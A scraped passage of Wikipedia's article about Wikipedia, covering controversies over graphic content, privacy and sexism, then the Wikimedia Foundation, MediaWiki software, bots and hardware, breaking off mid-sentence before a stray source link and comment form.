Wikipedia has been criticized for allowing information about graphic content. Articles depicting what some critics have called objectionable content (such as feces, cadaver, human penis, vulva, and nudity) contain graphic pictures and detailed information easily available to anyone with access to the internet, including children.

The site also includes sexual content such as images and videos of masturbation and ejaculation, illustrations of zoophilia, and photos from hardcore pornographic films in its articles. It also has non-sexual photographs of nude children.

The Wikipedia article about Virgin Killer—a 1976 album from the GermanrockbandScorpions—features a picture of the album's original cover, which depicts a naked prepubescent girl. The original release cover caused controversy and was replaced in some countries. In December 2008, access to the Wikipedia article Virgin Killer was blocked for four days by most Internet service providers in the United Kingdom after the Internet Watch Foundation (IWF) decided the album cover was a potentially illegal indecent image and added the article's URL to a "blacklist" it supplies to British internet service providers.[222]

In April 2010, Sanger wrote a letter to the Federal Bureau of Investigation, outlining his concerns that two categories of images on Wikimedia Commons contained child pornography, and were in violation of US federal obscenity law.[223][224] Sanger later clarified that the images, which were related to pedophilia and one about lolicon, were not of real children, but said that they constituted "obscene visual representations of the sexual abuse of children", under the PROTECT Act of 2003.[225] That law bans photographic child pornography and cartoon images and drawings of children that are obscene under American law.[225] Sanger also expressed concerns about access to the images on Wikipedia in schools.[226]Wikimedia Foundation spokesman Jay Walsh strongly rejected Sanger's accusation,[227] saying that Wikipedia did not have "material we would deem to be illegal. If we did, we would remove it."[227] Following the complaint by Sanger, Wales deleted sexual images without consulting the community. After some editors who volunteer to maintain the site argued that the decision to delete had been made hastily, Wales voluntarily gave up some of the powers he had held up to that time as part of his co-founder status. He wrote in a message to the Wikimedia Foundation mailing-list that this action was "in the interest of encouraging this discussion to be about real philosophical/content issues, rather than be about me and how quickly I acted".[228] Critics, including Wikipediocracy, noticed that many of the pornographic images deleted from Wikipedia since 2010 have reappeared.[229]

Privacy

One privacy concern in the case of Wikipedia is the right of a private citizen to remain a "private citizen" rather than a "public figure" in the eyes of the law.[230][note 6] It is a battle between the right to be anonymous in cyberspace and the right to be anonymous in real life ("meatspace"). A particular problem occurs in the case of a relatively unimportant individual and for whom there exists a Wikipedia page against her or his wishes.

In January 2006, a German court ordered the German Wikipedia shut down within Germany because it stated the full name of Boris Floricic, aka "Tron", a deceased hacker. On February 9, 2006, the injunction against Wikimedia Deutschland was overturned, with the court rejecting the notion that Tron's right to privacy or that of his parents was being violated.[231]

Wikipedia has a "Volunteer Response Team" that uses Znuny, a free and open-source software fork of OTRS[232] to handle queries without having to reveal the identities of the involved parties. This is used, for example, in confirming the permission for using individual images and other media in the project.[233]

Sexism

Main article: Gender bias on Wikipedia

Wikipedia was described in 2015 as harboring a battleground culture of sexism and harassment.[234][235]

The perceived toxic attitudes and tolerance of violent and abusive language were reasons put forth in 2013 for the gender gap in Wikipedia editorship.[236]

Edit-a-thons have been held to encourage female editors and increase the coverage of women's topics.[237]

A comprehensive 2008 survey, published in 2016, found significant gender differences in: confidence in expertise, discomfort with editing, and response to critical feedback. "Women reported less confidence in their expertise, expressed greater discomfort with editing (which typically involves conflict), and reported more negative responses to critical feedback compared to men."[238]

Operation

Wikimedia Foundation and Wikimedia movement affiliates

Main article: Wikimedia Foundation

Wikipedia is hosted and funded by the Wikimedia Foundation, a non-profit organization which also operates Wikipedia-related projects such as Wiktionary and Wikibooks. The foundation relies on public contributions and grants to fund its mission.[239] The foundation's 2013 IRS Form 990 shows revenue of $39.7 million and expenses of almost $29 million, with assets of $37.2 million and liabilities of about $2.3 million.[240]

In May 2014, Wikimedia Foundation named Lila Tretikov as its second executive director, taking over for Sue Gardner.[241] The Wall Street Journal reported on May 1, 2014, that Tretikov's information technology background from her years at University of California offers Wikipedia an opportunity to develop in more concentrated directions guided by her often repeated position statement that, "Information, like air, wants to be free."[242][243] The same Wall Street Journal article reported these directions of development according to an interview with spokesman Jay Walsh of Wikimedia, who "said Tretikov would address that issue (paid advocacy) as a priority. 'We are really pushing toward more transparency ... We are reinforcing that paid advocacy is not welcome.' Initiatives to involve greater diversity of contributors, better mobile support of Wikipedia, new geo-location tools to find local content more easily, and more tools for users in the second and third world are also priorities," Walsh said.[242]

Following the departure of Tretikov from Wikipedia due to issues concerning the use of the "superprotection" feature which some language versions of Wikipedia have adopted, Katherine Maher became the third executive director of the Wikimedia Foundation in June 2016.[244] Maher has stated that one of her priorities would be the issue of editor harassment endemic to Wikipedia as identified by the Wikipedia board in December. Maher stated regarding the harassment issue that: "It establishes a sense within the community that this is a priority ... (and that correction requires that) it has to be more than words."[245]

Wikipedia is also supported by many organizations and groups that are affiliated with the Wikimedia Foundation but independently-run, called Wikimedia movement affiliates. These include Wikimedia chapters (which are national or sub-national organizations, such as Wikimedia Deutschland and Wikimédia France), thematic organizations (such as Amical Wikimedia for the Catalan language community), and user groups. These affiliates participate in the promotion, development, and funding of Wikipedia.

Software operations and support

See also: MediaWiki

The operation of Wikipedia depends on MediaWiki, a custom-made, free and open sourcewiki software platform written in PHP and built upon the MySQL database system.[246] The software incorporates programming features such as a macro language, variables, a transclusion system for templates, and URL redirection. MediaWiki is licensed under the GNU General Public License (GPL) and it is used by all Wikimedia projects, as well as many other wiki projects. Originally, Wikipedia ran on UseModWiki written in Perl by Clifford Adams (Phase I), which initially required CamelCase for article hyperlinks; the present double bracket style was incorporated later. Starting in January 2002 (Phase II), Wikipedia began running on a PHP wiki engine with a MySQL database; this software was custom-made for Wikipedia by Magnus Manske. The Phase II software was repeatedly modified to accommodate the exponentially increasing demand. In July 2002 (Phase III), Wikipedia shifted to the third-generation software, MediaWiki, originally written by Lee Daniel Crocker.

Several MediaWiki extensions are installed[247] to extend the functionality of the MediaWiki software.

In April 2005, a Lucene extension[248][249] was added to MediaWiki's built-in search and Wikipedia switched from MySQL to Lucene for searching. Lucene was later replaced by CirrusSearch which is based on Elasticsearch.[250]

In July 2013, after extensive beta testing, a WYSIWYG (What You See Is What You Get) extension, VisualEditor, was opened to public use.[251][252][253][254] It was met with much rejection and criticism, and was described as "slow and buggy".[255] The feature was changed from opt-out to opt-in afterward.

Automated editing

Main article: Wikipedia bots

Computer programs called bots have often been used to perform simple and repetitive tasks, such as correcting common misspellings and stylistic issues, or to start articles such as geography entries in a standard format from statistical data.[256][257][258] One controversial contributor, Sverker Johansson, creating articles with his bot was reported to create up to 10,000 articles on the Swedish Wikipedia on certain days.[259] Additionally, there are bots designed to automatically notify editors when they make common editing errors (such as unmatched quotes or unmatched parentheses).[260] Edits falsely identified by bots as the work of a banned editor can be restored by other editors. An anti-vandal bot is programmed to detect and revert vandalism quickly.[257] Bots are able to indicate edits from particular accounts or IP address ranges, as occurred at the time of the shooting down of the MH17 jet incident in July 2014 when it was reported that edits were made via IPs controlled by the Russian government.[261] Bots on Wikipedia must be approved before activation.[262]

According to Andrew Lih, the current expansion of Wikipedia to millions of articles would be difficult to envision without the use of such bots.[263]

Hardware operations and support

See also: Wikimedia Foundation § Hardware

Wikipedia receives between 25,000 and 60,000-page requests per second, depending on the time of the day.[264][needs update] As of 2021,[update] page requests are first passed to a front-end layer of Varnish

Источник: [https://torrent-igruha.org/3551-portal.html]

2 comments

Leave a Reply

Your email address will not be published. Required fields are marked *